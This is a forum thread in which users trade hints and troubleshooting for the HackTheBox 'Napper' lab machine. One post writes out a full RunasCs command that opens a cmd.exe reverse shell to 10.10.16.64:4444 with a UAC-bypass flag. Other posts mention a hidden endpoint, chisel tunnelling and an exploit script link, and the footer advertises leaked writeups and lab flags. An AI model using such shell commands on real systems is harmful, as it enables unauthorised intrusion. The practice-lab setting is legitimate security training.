Possibly Related Threads…

scp · Nov 15, 2023, 05:21 PM

(Nov 11, 2023, 08:08 PM)Akless Wrote: /ews/MsExgHealthCheckd/

how did you find this endpoint?

nenandjabhata · Nov 15, 2023, 09:22 PM

Can anyone tell me why i have errors here please?
<code>
C:\Temp\www\internal\content\posts\internal-laps-alpha>.\RunasCs.exe backup ytkCAMAGNEfDiMAvFpdEVGyNzQotkczpxOstRvNT cmd.exe -r 10.10.16.64:4444 -t 8 --bypass-uac
.\RunasCs.exe backup ytkCAMAGNEfDiMAvFpdEVGyNzQotkczpxOstRvNT cmd.exe -r 10.10.16.64:4444 -t 8 --bypass-uac

Unhandled Exception: System.MissingMethodException: Method not found: 'System.String[] System.String.Split(Char, System.StringSplitOptions)'.
at RunasCsMainClass.ValidateRemote(String remote)
at RunasCsMainClass.RunasCsMain(String[] args)
at MainClass.Main(String[] args)
</code>

VrxWqpKiQ7LSpX · Nov 16, 2023, 08:17 AM

(Nov 15, 2023, 05:21 PM)scp Wrote:
(Nov 11, 2023, 08:08 PM)Akless Wrote: /ews/MsExgHealthCheckd/

how did you find this endpoint?

You need to read the malweare analysis in the web site.
First you need to find the host name with enum.
Then you need to find a user (try to read the blog post)
And then you will have more information about the /ews/MsExgHealthCheckd/

greenSheep12 · Nov 16, 2023, 02:31 PM

(Nov 12, 2023, 02:18 PM)maybemia Wrote:
(Nov 12, 2023, 02:01 PM)tazarkour Wrote:
(Nov 12, 2023, 01:53 PM)peRd1 Wrote:
(Nov 12, 2023, 01:42 PM)tazarkour Wrote:
(Nov 12, 2023, 01:40 PM)VfV Wrote: +1 , what were the steps involved in order to arrive there? I'm trying to learn

Maybe they used a custom dict or just saw the name of the machine so they recognized the vulnerability.
Read the blog posts, entries, on the website and its internal sites, once you could logon there. It's all there, also specifies sources regarding that vulnerability.

How can I login there ?

I find something useful in "https://app.napper.htb/posts/setup-basic-auth-powershell/" step 6, which solve my problem. Thanks. It seams I need to learn more recon things.

Gosh this is a good lesson to start reading stuff

monkeythefirst · Nov 17, 2023, 11:02 AM

About this script:

https://github.com/Burly0/HTB-Napper

I did not get shell, what is problem ?

Anonymous21 · Nov 17, 2023, 03:33 PM

(Nov 17, 2023, 11:02 AM)monkeythefirst Wrote: About this script:

https://github.com/Burly0/HTB-Napper
I did not get shell, what is problem ?

why it,s not working tell me

intersteller2038 · Nov 17, 2023, 06:10 PM

I'm not able to port forward to port 9200 using chisel, I'm getting this error:
curl: (35) OpenSSL SSL_connect: SSL_ERROR_SYSCALL in connection to 127.0.0.1:9200

Can someone help me?

RebeLHeX · Nov 18, 2023, 01:01 AM

Make sure you are in a place you can execute like C:\Temp\

m1lk · Nov 18, 2023, 05:28 PM

My chisel isn't working, am getting blank output

monkeythefirst · Nov 19, 2023, 11:08 PM

Hi everybody. PLS help with two questions:
1. how long do seed and hash live? After decryption i got result "username or password not correct"
2. What options with RunasCs.exe need? No result
Thanks advance.

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	367	90,841	3 hours ago Last Post: Anon141234
	[MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot	htb-bot	85	7,678	10 hours ago Last Post: Fr1Rtx23
	[FREE] HackTheBox All Cheatsheets	Tamarisk	1	239	10 hours ago Last Post: Fr1Rtx23
	rev_dudidudida	cavour13	1	233	Today, 12:25 AM Last Post: 0xcreep
	[FREE] HTB HackTheBox CPTS CBBH CDSA CWEE exam preparation guide and hints	Tamarisk	5	1,849	Yesterday, 08:42 PM Last Post: Tamarisk